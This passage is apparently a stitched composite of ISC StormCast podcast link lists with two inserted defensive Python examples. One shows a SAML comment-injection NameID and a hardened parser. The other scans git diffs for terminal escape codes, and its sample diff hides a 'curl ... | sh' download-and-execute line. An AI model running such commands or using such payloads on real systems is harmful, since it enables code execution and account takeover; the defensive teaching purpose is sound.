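# an empty comment is inserted in transit. Canonicalization drops comments, so
# a signature computed over the original assertion still verifies.
TAMPERED_ASSERTION = (
    '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    "<saml:Subject>"
    "<saml:NameID>admin@example.com<!---->.attacker.example</saml:NameID>"
    "</saml:Subject>"
    "</saml:Assertion>"
)

# Constructed: the same element as a legitimate IdP would emit it.
CLEAN_ASSERTION = (
    '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    "<saml:Subject>"
    "<saml:NameID>admin@example.com</saml:NameID>"
    "</saml:Subject>"
    "</saml:Assertion>"
)


def _name_id_element(assertion_xml):
    doc = minidom.parseString(assertion_xml)
    return doc.getElementsByTagNameNS(SAML_NS, "NameID")[0]


def name_id_first_text_node(assertion_xml):
    """Vulnerable pattern: return the first text node's data. minidom keeps the
    comment as a node of its own, so the text after it is never looked at and
    the service provider logs the attacker in as admin@example.com."""
    return _name_id_element(assertion_xml).firstChild.data


def name_id_all_text_nodes(assertion_xml):
    """Join every text node under NameID. This yields the identity the IdP
    actually asserted, but still silently accepts a tampered element."""
    element = _name_id_element(assertion_xml)
    return "".join(
        child.data for child in element.childNodes
        if child.nodeType == child.TEXT_NODE
    )


def name_id_strict(assertion_xml):
    """Hardened: a NameID must be exactly one text node. Comments, CDATA
    sections or child elements inside an identifier are not something a
    legitimate IdP produces, so reject the assertion instead of guessing."""
    element = _name_id_element(assertion_xml)
    children = element.childNodes
    if len(children) != 1 or children[0].nodeType != element.TEXT_NODE:
        raise ValueError("NameID must consist of a single text node")
    return children[0].data.strip()


def name_id_is_well_formed(assertion_xml):
    """True when the strict extractor accepts the NameID."""
    try:
        name_id_strict(assertion_xml)
    except ValueError:
        return False
    return True
```

Rejecting any NameID that is not a single text node closes the gap regardless of how the underlying XML library tokenizes character data around comments, which is the property the affected implementations were relying on without checking.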

ISC StormCast for Tuesday, February 27th 2018

Enumerating S3 Buckets
https://github.com/jordanpotti/AWSBucketDump
Creating AWS Network Diagrams
https://github.com/duo-labs/cloudmapper
Selling Macs and the "Find My Mac" Feature
https://medium.com/@mulligan/how-i-sold-an-old-mac-and-unknowingly-tracked-its-location-for-over-3-years-9a35cd3ca4cf
Apple Stopping Support for 1st Gen Apple TV and iTunes on Windows XP / Vista
https://support.apple.com/en-us/HT208104
2/27/2018, 4 minutes, 44 seconds

ISC StormCast for Monday, February 26th 2018

Retrieving Malware Over Tor On Windows (Update)
https://isc.sans.edu/forums/diary/Retrieving+malware+over+Tor+on+Windows/23379/
Blackholing Advertising Sites with Pi-hole
https://isc.sans.edu/forums/diary/Blackhole+Advertising+Sites+with+Pihole/23377/
TaxSlayer Consent Decree with FTC
https://biglawbusiness.com/cybersecurity-enforcers-wake-up-to-unauthorized-computer-access-via-credential-stuffing/
Fortinet: OMG Mirai Variant Turns IoT Devices into Proxy Servers
https://www.fortinet.com/blog/threat-research/omg--mirai-based-bot-turns-iot-devices-into-proxy-servers.html
2/26/2018, 5 minutes, 33 seconds

ISC StormCast for Friday, February 2nd 2018

Adobe Flash 0-Day
https://isc.sans.edu/forums/diary/Adobe+Flash+0Day+Used+Against+South+Korean+Targets/23301/
Adaptive Phishing Kit
https://isc.sans.edu/forums/diary/Adaptive+Phishing+Kit/23299/
Crypto Miners "Payload of Choice"
http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html
AutoSploit Links Shodan to Metasploit
https://github.com/NullArray/AutoSploit
2/2/2018, 5 minutes, 31 seconds

ISC StormCast for Thursday, February 1st 2018

Tax Phishing Season Starts
https://isc.sans.edu/forums/diary/Tax+Phishing+Time/23295/
Using FLIR In Incident Response
https://isc.sans.edu/forums/diary/Using+FLIR+in+Incident+Response/23291/
Oracle MICROS POS Vulnerability
https://erpscan.com/press-center/blog/oracle-micros-pos-breached/
2/1/2018, 6 minutes, 50 seconds

ISC StormCast for Wednesday, January 31st 2018

DCShadow Attack
https://www.dropbox.com/s/baypdb6glmvp0j9/Buehat%20IL%20v2.3.pdf
https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
Cisco WebVPN Update
https://isc.sans.edu/forums/diary/Cisco+ASA+WebVPN+Vulnerability/23289/
Reviving DDE Code Execution via OneNote
https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
1/30/2018, 6 minutes, 56 seconds

ISC StormCast for Tuesday, January 30th 2018

Lenovo Fingerprint Manager Pro Vulnerability
https://support.lenovo.com/us/en/product_security/len-15999
ClamAV Vulnerabilities
http://blog.clamav.net/2018/01/clamav-0993-has-been-released.html
Malwarebytes Corrupted Update
https://blog.malwarebytes.com/malwarebytes-news/2018/01/important-web-blocking-ram-usage/
https://www.malwarebytes.com/pdf/WebProtectionFP.pdf
Cisco Adaptive Security Appliance Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1
Tor2Web Proxy onion.top Appears to Steal Ransomware Payments
https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransomware-bitcoin-payments-onion-domains
1/30/2018, 6 minutes, 11 seconds

ISC StormCast for Monday, January 29th 2018

Analyzing a Word Document Used in a Pentest
https://isc.sans.edu/forums/diary/Is+this+a+pentest/23283/
Analyzing BITS Activity
https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
Cryptojacking on YouTube via Malicious Ads
https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
Coincheck Hack Nets 400M USD
https://coincheck.com/en/blog/4673
phpBB Mirror Compromised
https://www.phpbb.com/community/viewtopic.php?f=14&t=2456896
Microsoft Disables Spectre Variant 2 Patches
https://support.microsoft.com/en-us/help/4078130/update-to-disable-mitigation-against-spectre-variant-2
1/29/2018, 6 minutes, 10 seconds

ISC StormCast for Friday, January 26th 2018

Ransomware As a Service
https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/
libcurl Vulnerability
http://seclists.org/oss-sec/2018/q1/94
Hide 'N Seek IoT Botnet
https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/
Container Intrusions: Assessing the Efficacy of Intrusion Detection and Analysis Methods for Linux Container Environments
https://www.sans.org/reading-room/whitepapers/detection/container-intrusions-assessing-efficacy-intrusion-detection-analysis-methods-linux-container-environments-38245
1/25/2018, 17 minutes, 42 seconds

ISC StormCast for Thursday, January 25th 2018

RTF Files For Hancitor Utilize Exploit for CVE-2017-11882
https://isc.sans.edu/forums/diary/RTF+files+for+Hancitor+utilize+exploit+for+CVE201711882/23271/
Electron Fixes Protocol Handler Flaw
https://electronjs.org/blog/protocol-handler-fix
Xerox WorkCentres Swap Written Numbers When Scanning
http://www.dkriesel.com/en/blog/2013/0802_xerox-workcentres_are_switching_written_numbers_when_scanning?
Tracking Users Using CSS
https://github.com/jbtronics/CrookedStyleSheets
1/25/2018, 5 minutes, 36 seconds

ISC StormCast for Wednesday, January 24th 2018

Apple Patches Everything, Again
https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23269/
OpenSSL Introduces its Version of a "Patch Tuesday"
https://www.openssl.org/blog/blog/2018/01/18/f2f-london/
"Rapid" Ransomware
https://id-ransomware.blogspot.ru/2018/01/rapid-ransomware.html (Russian)
https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/page-2
1/24/2018, 5 minutes, 30 seconds

ISC StormCast for Tuesday, January 23rd 2018

HTTPS on Every Port
https://isc.sans.edu/forums/diary/HTTPS+on+every+port/23261/
curl over Tor
https://isc.sans.edu/forums/diary/Retrieving+malware+over+Tor/23257/
Spectre/Meltdown Microcode Patch Problems
https://newsroom.intel.com/news/root-cause-of-reboot-issue-identified-updated-guidance-for-customers-and-partners/
https://lkml.org/lkml/2018/1/21/192
DNS Rebinding Attacks Against Geth
https://ret2got.wordpress.com/2018/01/19/how-your-ethereum-can-be-stolen-using-dns-rebinding/
Chinese Quantum Cryptography Satellite Link Carries Intercontinental Video Call
https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.120.030501
1/23/2018, 5 minutes, 4 seconds

ISC StormCast for Monday, January 22nd 2018

Analyzing an RTF Phishing Document
https://isc.sans.edu/forums/diary/An+RTF+phish/23255/
Satori Variant Steals ETH from Miners
http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/
Evrial Trojan Modifies Copied and Pasted Bitcoin Addresses
https://twitter.com/malwrhunterteam/status/953313514629853184
Legal Challenges of Bug Bounties (German)
https://www.heise.de/security/meldung/US-Bug-Bountys-lassen-gute-Hacker-in-die-Falle-tappen-3946508.html
1/22/2018, 5 minutes, 16 seconds

ISC StormCast for Friday, January 19th 2018

Oracle E-Business Suite Server Can Be Attacked via WebLogic
https://www.onapsis.com/blog/oracle-january-cpu-analysis-64-patches-affect-business-critical-applications
Microsoft Resumes Patches for AMD Systems
https://www.amd.com/en/corporate/speculative-execution
Speculation About Yet Another CPU Attack
https://skyfallattack.com
Smiths Medfusion 4000 Vulnerabilities
https://github.com/sgayou/medfusion-4000-research/blob/master/doc/README.md#summary
1/19/2018, 5 minutes, 9 seconds

ISC StormCast for Thursday, January 18th 2018

Reviewing the Spam Filters: Malspam Pushing Gozi-ISFB
https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245/
Auditing Secure USB Keys
https://www.j-michel.org/blog/2018/01/16/attacking-secure-usb-keys-behind-the-scene
Malicious Open Graph Title Tag Crashes iMessage
https://www.macrumors.com/2018/01/16/malicious-link-ios-mac-freezes/
BIND Fixes DoS Vulnerability
https://kb.isc.org/article/AA-01542
1/18/2018, 5 minutes, 13 seconds

ISC StormCast for Tuesday, January 9th 2018

WebLogic Flaw Used to Install Monero Crypto Coin Miner
https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/
Fake Anti-Virus Pages Popping Up Like Weeds
https://isc.sans.edu/forums/diary/Fake+antivirus+pages+popping+up+like+weeds/23207/
Apple Spectre/Meltdown Patches
https://support.apple.com/en-us/HT201222
Meltdown Patch Fallout
https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB43600/?l=en_US&fs=Search&pn=1&atype=
https://forums.sandboxie.com/phpBB3/viewtopic.php?t=25114
https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software
WPA3 Announced
https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-security-enhancements
1/9/2018, 5 minutes, 27 seconds

ISC StormCast for Monday, January 8th 2018

Campaign is Using a Recently Released WebLogic Exploit to Deploy a Monero Miner
https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/
Misc News about Meltdown and Spectre
https://www.qualcomm.com/company/product-security/bulletins
AMD Processor Flaw
http://seclists.org/fulldisclosure/2018/Jan/12
Western Digital MyCloud Backdoor
http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125
1/8/2018, 5 minutes, 14 seconds

ISC StormCast for Friday, January 5th 2018

SANS Special Webcast
https://www.sans.org/webcast/recording/citrix/106815/138095
ISC Diary with Links to Patches
https://isc.sans.edu/forums/diary/Spectre+and+Meltdown+What+You+Need+to+Know+Right+Now/23193/
1/5/2018, 7 minutes, 44 seconds

ISC StormCast for Thursday, January 4th 2018

Intel CPU Vulnerability
https://meltdownattack.com
Crypto Coin Mining Pool IP List
https://isc.sans.edu/api/threatlist/miner
Phishing to Rural America Leads to Six-figure Wire Fraud Losses
https://isc.sans.edu/forums/diary/Phishing+to+Rural+America+Leads+to+Sixfigure+Wire+Fraud+Losses/23185/
1/4/2018, 7 minutes, 33 seconds

ISC StormCast for Wednesday, January 3rd 2018

Extracting URLs From PDFs
https://isc.sans.edu/forums/diary/PDF+documents+URLs+update/23167/
Privilege Escalation Exploit for macOS
https://siguza.github.io/IOHIDeous/
34C3: Chaos Communication Congress
https://media.ccc.de/c/34c3
Vulnerabilities in Online Geolocation Services
https://0x0.li/trackmageddon/
1/3/2018, 6 minutes, 46 seconds

ISC StormCast for Tuesday, January 2nd 2018

Analyzing TNEF Files
https://isc.sans.edu/forums/diary/Analyzing+TNEF+files/23175/
Obfuscated RTF Files
https://isc.sans.edu/forums/diary/Dealing+with+obfuscated+RTF+files/23169/
2017 Flood of CVEs
https://isc.sans.edu/forums/diary/2017+The+Flood+of+CVEs/23173/
Sonos/Bose Smart Speaker Flaws
https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-Attack.pdf
Web Trackers Exploit Login Managers
https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
Backdoored WordPress Plugins
https://www.bleepingcomputer.com/news/security/three-more-wordpress-plugins-found-hiding-a-backdoor/
1/1/2018, 7 minutes, 21 seconds

ISC StormCast for Friday, December 22nd 2017

Critical Flaw in SMBv1 Implementation of Dell EMC Data Domain DD OS
http://seclists.org/fulldisclosure/2017/Dec/79
Facebook Enables Feature To Review All E-Mails Sent By Facebook
https://www.facebook.com/notes/facebook-security/new-security-feature-reveals-if-facebook-mails-are-legit/10154983636230766/
EtherDelta DNS Attack
https://twitter.com/etherdelta
Enigmail Vulnerability
https://enigmail.net/download/other/Enigmail%20Pentest%20Report%20by%20Cure53%20-%20Excerpt.pdf
12/22/2017, 6 minutes, 16 seconds

ISC StormCast for Thursday, December 21st 2017

Kernel Hooking Basics
https://isc.sans.edu/forums/diary/Guest+Diary+Etay+Nir+Kernel+Hooking+Basics/23155/
Intel Memory Encryption
https://software.intel.com/sites/default/files/managed/a5/16/Multi-Key-Total-Memory-Encryption-Spec.pdf
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=33e63acc119d15c2fac3e3775f32d1ce7a01021b
WordPress Sites Infected with Monero Miners
https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack/
12/21/2017, 4 minutes, 51 seconds

ISC StormCast for Wednesday, December 20th 2017

Example of "MouseOver" Link in a PowerPoint File
https://isc.sans.edu/forums/diary/Example+of+MouseOver+Link+in+a+Powerpoint+File/23149/
Adups Malware Still Haunting Android Phones
https://blog.malwarebytes.com/cybercrime/2017/12/mobile-menace-monday-upping-the-ante-on-adups-fwupgradeprovider/
Popular WordPress Captcha Plugin Included Backdoor
https://www.wordfence.com/blog/2017/12/backdoor-captcha-plugin/
Comparing DNS Filters
https://medium.com/@nykolas.z/dns-security-filters-compared-quad9-x-opendns-x-comodo-secure-x-norton-connectsafe-x-yandex-safe-a00ace3bf21f
12/20/2017, 5 minutes, 29 seconds

ISC StormCast for Tuesday, December 19th 2017

Not So Malicious Word Doc
https://isc.sans.edu/forums/diary/Phish+or+scam+Part+1/23141/
https://isc.sans.edu/forums/diary/Phish+or+scam+Part+2/23145/
AMF Deserializer Vulnerability
http://codewhitesec.blogspot.com/2017/04/amf.html?m=1
Windows "Keeper" Password Manager Vulnerable
https://bugs.chromium.org/p/project-zero/issues/detail?id=1481&desc=3
Android Malware Destroys Device
https://securelist.com/jack-of-all-trades/83470/
12/19/2017, 5 minutes, 16 seconds

ISC StormCast for Monday, December 18th 2017

Microsoft Office VBA Macro Obfuscation via Metadata
https://isc.sans.edu/forums/diary/Microsoft+Office+VBA+Macro+Obfuscation+via+Metadata/23139/
Large-Scale BGP Attack
https://bgpmon.net/popular-destinations-rerouted-to-russia/
HSTS and HPKP Weaknesses in Firefox, IE/Edge and Chrome
http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html
12/18/2017, 5 minutes, 44 seconds

ISC StormCast for Friday, December 15th 2017

Citizen Lab Security Planner
https://securityplanner.org/
Apple Update to iOS/tvOS/iCloud (Windows)
https://support.apple.com/en-us/HT201222
Fortinet FortiClient VPN Credentials Disclosure via Shared Key
https://www.sec-consult.com/en/blog/advisories/vpn-credentials-disclosure-in-fortinet-forticlient/index.html
Fox-IT Victim of a Man-in-the-Middle Attack
https://blog.fox-it.com/2017/12/14/lessons-learned-from-a-man-in-the-middle-attack/
12/15/2017, 5 minutes, 24 seconds

ISC StormCast for Thursday, December 14th 2017

Tracking Newly Registered Domains
https://isc.sans.edu/forums/diary/Tracking+Newly+Registered+Domains/23127/
Critical Palo Alto Firewall Flaws Allow RCE as root
http://seclists.org/fulldisclosure/2017/Dec/38
Hiding Changes from git-diff with Terminal Escape Sequences
https://www.twistlock.com/2017/12/13/hiding-content-git-escape-sequence-twistlock-labs-experiment/
Apple AirPort Update
https://support.apple.com/en-us/HT208354
12/14/2017, 5 minutes, 14 seconds
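The Twistlock item above is about terminal escape sequences embedded in committed files so that a `git diff` rendered in a terminal hides part of an added line from the reviewer. The Python below is an added example, not from the podcast or the linked post, of a pre-review check that flags control bytes in a patch, lists the added lines that carry them and rewrites them into a visible form; the patch it scans is a constructed sample, and the cursor-up/erase-line sequence in it is one illustration of the technique rather than the specific payload the post used.

```python
"""Added example: flag terminal control sequences hidden in a patch before a
human reviews it in a terminal. The diff below is a constructed sample."""
import re

# Constructed sample: the first added line ends with two ANSI CSI sequences,
# cursor-up (ESC[1A) and erase-line (ESC[2K). A pager that passes raw control
# characters through renders the next line on top of it, so the reviewer sees
# "echo 'deploy ok'" where the curl|sh line actually is.
SAMPLE_DIFF = (
    "diff --git a/deploy.sh b/deploy.sh\n"
    "--- a/deploy.sh\n"
    "+++ b/deploy.sh\n"
    "@@ -1,2 +1,3 @@\n"
    " set -e\n"
    "+curl -s https://example.invalid/payload | sh\x1b[1A\x1b[2K\n"
    "+echo 'deploy ok'\n"
    " exit 0\n"
)

# Three alternatives, tried in order:
#   1. CSI: ESC '[' parameter bytes, intermediate bytes, one final byte
#   2. any other two-byte ESC sequence (ESC followed by 0x40..0x5F)
#   3. a lone C0 control other than TAB/LF (CR included, since a mid-line CR
#      overwrites what precedes it), DEL, or a C1 control
CONTROL_RE = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"
    r"|\x1b[@-_]"
    r"|[\x00-\x08\x0b-\x1f\x7f\x80-\x9f]"
)


def _lines(diff_text):
    """Split on LF only (str.splitlines would also split on VT, FF, NEL and
    shift line numbers) and peel off a CRLF carriage return so ordinary
    Windows line endings are not reported."""
    for lineno, raw in enumerate(diff_text.split("\n"), start=1):
        body, ending = (raw[:-1], "\r") if raw.endswith("\r") else (raw, "")
        yield lineno, body, ending


def _kind(seq):
    if seq.startswith("\x1b["):
        return "CSI"
    if seq.startswith("\x1b"):
        return "ESC"
    return "control"


def find_control_sequences(diff_text):
    """Return (line_number, kind, repr(sequence)) for every control sequence in
    the diff, context lines included: they show what the repository already
    carries, which matters as much as what this patch adds."""
    return [
        (lineno, _kind(m.group(0)), repr(m.group(0)))
        for lineno, body, _ in _lines(diff_text)
        for m in CONTROL_RE.finditer(body)
    ]


def added_lines_with_controls(diff_text):
    """Line numbers (within the diff text) of '+' lines that carry control
    sequences: the lines a reviewer must read in sanitized form."""
    flagged = {lineno for lineno, _, _ in find_control_sequences(diff_text)}
    return [
        lineno
        for lineno, body, _ in _lines(diff_text)
        if lineno in flagged and body.startswith("+") and not body.startswith("+++")
    ]


def _visible(ch):
    """Caret notation for C0/DEL (what `cat -v` prints), hex for C1."""
    code = ord(ch)
    if 0x20 <= code < 0x7f:
        return ch
    if code < 0x80:
        return "^" + chr(code ^ 0x40)
    return f"\\x{code:02x}"


def sanitize_for_display(diff_text):
    """Rewrite every control sequence into a visible form so the diff can be
    read in a terminal without the terminal acting on it."""
    out = []
    for _, body, ending in _lines(diff_text):
        safe = CONTROL_RE.sub(lambda m: "".join(_visible(c) for c in m.group(0)), body)
        out.append(safe + ending)
    return "\n".join(out)
```

Piping a diff through `cat -v` gives the same visibility interactively; the scanner is the form you would wire into a CI job or a pre-receive hook so that a patch with control bytes in it is held for a look rather than merged on the strength of what the terminal happened to show.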

ISC StormCast for Wednesday, December 13th 2017

Microsoft Patch Tuesday Summary
https://isc.sans.edu/forums/diary/December+Microsoft+Patch+Tuesday+Summary/23123/
EV Certificate Model Broken?
https://stripe.ian.sh
ROBOT Attack Against TLS
https://robotattack.org
12/13/2017, 6 minutes, 31 seconds

ISC StormCast for Tuesday, December 12th 2017

Pornographic Spam Messages Used to Deliver Crypto Coin Miner https://isc.sans.edu/forums/diary/Pornographic+malspam+pushes+coin+miner+malware/23119/ Microsoft Leaks Secret SSL Key For Dynamics 365 https://medium.com/matthias-gliwka/microsoft-leaks-tls-private-key-for-cloud-erp-product-10b56f7d648 Proxy Botnet Used to Launch Variety of Web Application Attacks https://news.drweb.com/show/?i=11627&lng=en FoxIT Releases Utility to Recover Manipulated Windows Logs https://github.com/fox-it/danderspritz-evtx
12/12/2017, 6 minutes, 31 seconds

ISC StormCast for Monday, December 11th 2017

Sometimes An RTF Document is Just an RTF Document https://isc.sans.edu/forums/diary/Sometimes+its+a+dud/23115/ HP Keyboard Drivers Can Log Keystrokes https://support.hp.com/us-en/document/c05827409 https://zwclose.github.io/HP-keylogger/ Android App Signature Bypass https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures MSFT Patches Antimalware Engine https://portal.msrc.microsoft.com/en-US/eula
12/11/2017, 6 minutes, 13 seconds

ISC StormCast for Friday, December 8th 2017

Positive Technologies Demonstrates Intel ME Exploit at Blackhat Europe https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-Code-In-Intel-Management-Engine.pdf Tracking Users Without GPS http://ieeexplore.ieee.org/document/8038870/ Process Doppelgänging Anti-Malware Bypass https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf Friday Webcast About Recent OWASP Top 10 Update https://www.sans.org/webcasts/owasp-top-10-2017-106560
12/8/2017, 7 minutes, 7 seconds

ISC StormCast for Thursday, December 7th 2017

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple+Updates+Everything+Again/23107/ Do Not Trust Reverse DNS. And here is an example why https://isc.sans.edu/forums/diary/PSA+Do+not+Trust+Reverse+DNS+and+why+does+an+address+resolve+to+localhost/23105/ NiceHash Hacked https://www.reddit.com/r/NiceHash/comments/7i0s6o/official_press_release_statement_by_nicehash/
12/6/2017, 6 minutes, 8 seconds

ISC StormCast for Wednesday, December 6th 2017

AI.Type Data Exposed in MongoDB Database https://mackeepersecurity.com/post/virtual-keyboard-developer-leaked-31-million-of-client-records Mailsploit Makes it Easier to Spoof From Headers in E-Mails https://www.mailsploit.com StorageCrypt Ransomware Encrypts NAS Devices https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/ Android December Update https://source.android.com/security/bulletin/2017-12-01
12/6/2017, 5 minutes, 3 seconds

ISC StormCast for Tuesday, December 5th 2017

Incident Response Using TheHive https://isc.sans.edu/forums/diary/IR+using+the+Hive+Project/23099/ SSL/TLS For Scapy https://github.com/tintinweb/scapy-ssl_tls tvOS 11.2 Released (but no details about security content yet) https://support.apple.com/en-us/HT201222 System Vendors Ship Laptops With Intel ME Disabled https://www.reddit.com/r/linuxhardware/comments/7grglm/how_to_buy_a_dell_laptop_with_the_intel_me/ http://blog.system76.com/post/168050597573/system76-me-firmware-updates-plan Hacker Falsified Jail Records To Free Friend https://www.justice.gov/usao-edmi/pr/ann-arbor-man-pleads-guilty-computer-intrusion-case SeKey: Touch ID Control for ssh-agent https://github.com/ntrippar/sekey
12/5/2017, 6 minutes, 35 seconds

ISC StormCast for Monday, December 4th 2017

Brazilian Banking Malware Uses UTF-16 Encoded .BAT File https://isc.sans.edu/forums/diary/Phishing+campaign+uses+old+bat+script+to+spread+banking+malware+and+it+is+flying+under+the+radar/23091/ Phishing Abuse of JotForm https://isc.sans.edu/forums/diary/Phishing+Kit+AbUsing+Cloud+Services/23089/ Apple Releases iOS 11.2 https://support.apple.com/en-us/HT201222 (no details live yet) Critical Patch For RSA Authentication Agent http://seclists.org/fulldisclosure/2017/Nov/46 https://community.rsa.com/community/products/securid/authentication-agent-web-apache Slurp S3 Bucket Enumerator https://github.com/bbb31/slurp.git
12/4/2017, 5 minutes, 40 seconds

ISC StormCast for Friday, December 1st 2017

More Malspam Pushing Emotet Malware https://isc.sans.edu/forums/diary/More+Malspam+pushing+Emotet+malware/23083/ Google Chrome To Block Some Third Party Software Mid-2018 https://blog.chromium.org/2017/11/reducing-chrome-crashes-caused-by-third.html European Union Funds VLC Bug Bounty https://joinup.ec.europa.eu/news/hackerone-vlc STI Student Scott Perry: Virtual System Forensics http://www.sans.org/reading-room/whitepapers/bestprac/exploring-effectiveness-approaches-discovering-acquiring-virtualized-servers-esxi-38155
12/1/2017, 14 minutes, 35 seconds

ISC StormCast for Thursday, November 30th 2017

Apple Releases Security Update 2017-001 To Fix Passwordless Root Bug https://support.apple.com/en-us/HT208315 Insecure Android Crypto Currency Wallets https://www.htbridge.com/news/security-cryptocurrency-mobile-apps.html Coinhive Miner Now As Pop-Under https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/ Fileless Malicious PowerShell Sample https://isc.sans.edu/forums/diary/Fileless+Malicious+PowerShell+Sample/23081/ .dev TLD Now Requires HTTPS in Chrome http://www.theregister.co.uk/2017/11/29/google_dev_network/
11/30/2017, 5 minutes, 22 seconds

ISC StormCast for Wednesday, November 29th 2017

Passwordless Root Account Allows Trivial Privilege Escalation on macOS High Sierra https://twitter.com/lemiorhan/status/935578694541770752 https://support.apple.com/en-us/HT204012 Defeating Facial Recognition https://arxiv.org/abs/1711.09001 Bitcoin Gold Wallet App Compromise https://bitcoingold.org/critical-warning-nov-26/ Project Exodus Identified Trackers in Android Apps https://reports.exodus-privacy.eu.org/reports/apps/
11/29/2017, 6 minutes, 21 seconds

ISC StormCast for Tuesday, November 28th 2017

Golden SAML Ticket Attack https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ Facebook Poll Image Vulnerability https://blog.darabi.me/2017/11/image-removal-vulnerability-in-facebook.html
11/28/2017, 6 minutes, 34 seconds

ISC StormCast for Monday, November 27th 2017

Critical Exim Mail Server Vulnerability (Exploit released!) https://bugs.exim.org/show_bug.cgi?id=2199 CoinPouch "Verge" Token Loss http://www.documentcloud.org/documents/4309909-StatementonVerge-11-21-17.html Bitcoin Routing Attacks https://btc-hijack.ethz.ch Scanning Ethereum Smart Contracts For Vulnerabilities https://hackernoon.com/scanning-ethereum-smart-contracts-for-vulnerabilities-b5caefd995df Fortiweb Manager Vulnerability https://fortiguard.com/psirt/FG-IR-17-248
11/27/2017, 5 minutes, 52 seconds

ISC StormCast for Wednesday, November 22nd 2017

Ethereum JSON-RPC Scans https://isc.sans.edu/forums/diary/Internet+Wide+Ethereum+JSONRPC+Scans/23061/ Updated OWASP Top 10 Released https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf TPLink Often Provides Outdated Firmware Version For Download https://www.ctrl.blog/entry/tplink-firmware-outdated-downloads
11/22/2017, 6 minutes, 49 seconds

ISC StormCast for Tuesday, November 21st 2017

Intel Patches Several Vulnerabilities in its Management Engine https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&languageid=en-fr Sandsifter CPU Fuzzer https://github.com/xoreaxeaxeax/sandsifter/ Android MediaProjection API Allows For Screen Capture / Audio Recording Without User Consent https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-android-MediaProjection-tapjacking-advisory-2017-11-13.pdf BusyBox Autocompletion Vulnerability https://www.twistlock.com/2017/11/20/cve-2017-16544-busybox-autocompletion-vulnerability/
11/21/2017, 5 minutes, 42 seconds

ISC StormCast for Monday, November 20th 2017

Bitcoin Pickpockets Scanning For Wallets https://isc.sans.edu/forums/diary/BTC+Pickpockets/23052/ Resume-themed Malspam Pushing Smoke Loader https://isc.sans.edu/forums/diary/Resumethemed+malspam+pushing+Smoke+Loader/23054/ F5-BigIP TLS Vulnerability https://support.f5.com/csp/article/K21905460 Microsoft Updates Patches / May Have Lost Sourcecode https://0patch.blogspot.com/2017/11/did-microsoft-just-manually-patch-their.html http://borncity.com/win/2017/11/17/microsoft-confirms-epson-dot-matrix-printer-issue-after-november-2017-patchday-here-are-fixes/ Windows 8 And Later Fail To Apply ASLR Correctly https://www.kb.cert.org/vuls/id/817544 StartCom TLS Certificate Authority Shutting Down http://www.zdnet.com/article/startcom-to-shut-down-all-certificates-revoked-in-2020/
11/20/2017, 7 minutes, 8 seconds

ISC StormCast for Friday, November 17th 2017

A Domain Dashboard For Splunk https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/ Oracle Critical PeopleSoft Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-10269-4021872.html#AppendixFMW GitHub Introducing Security Alerts for Dependencies https://github.com/blog/2470-introducing-security-alerts-on-github Exposing IP Addresses For Hidden Services http://sh1ttykids.hateblo.jp/entry/2017/11/16/182001
11/17/2017, 6 minutes

ISC StormCast for Thursday, November 16th 2017

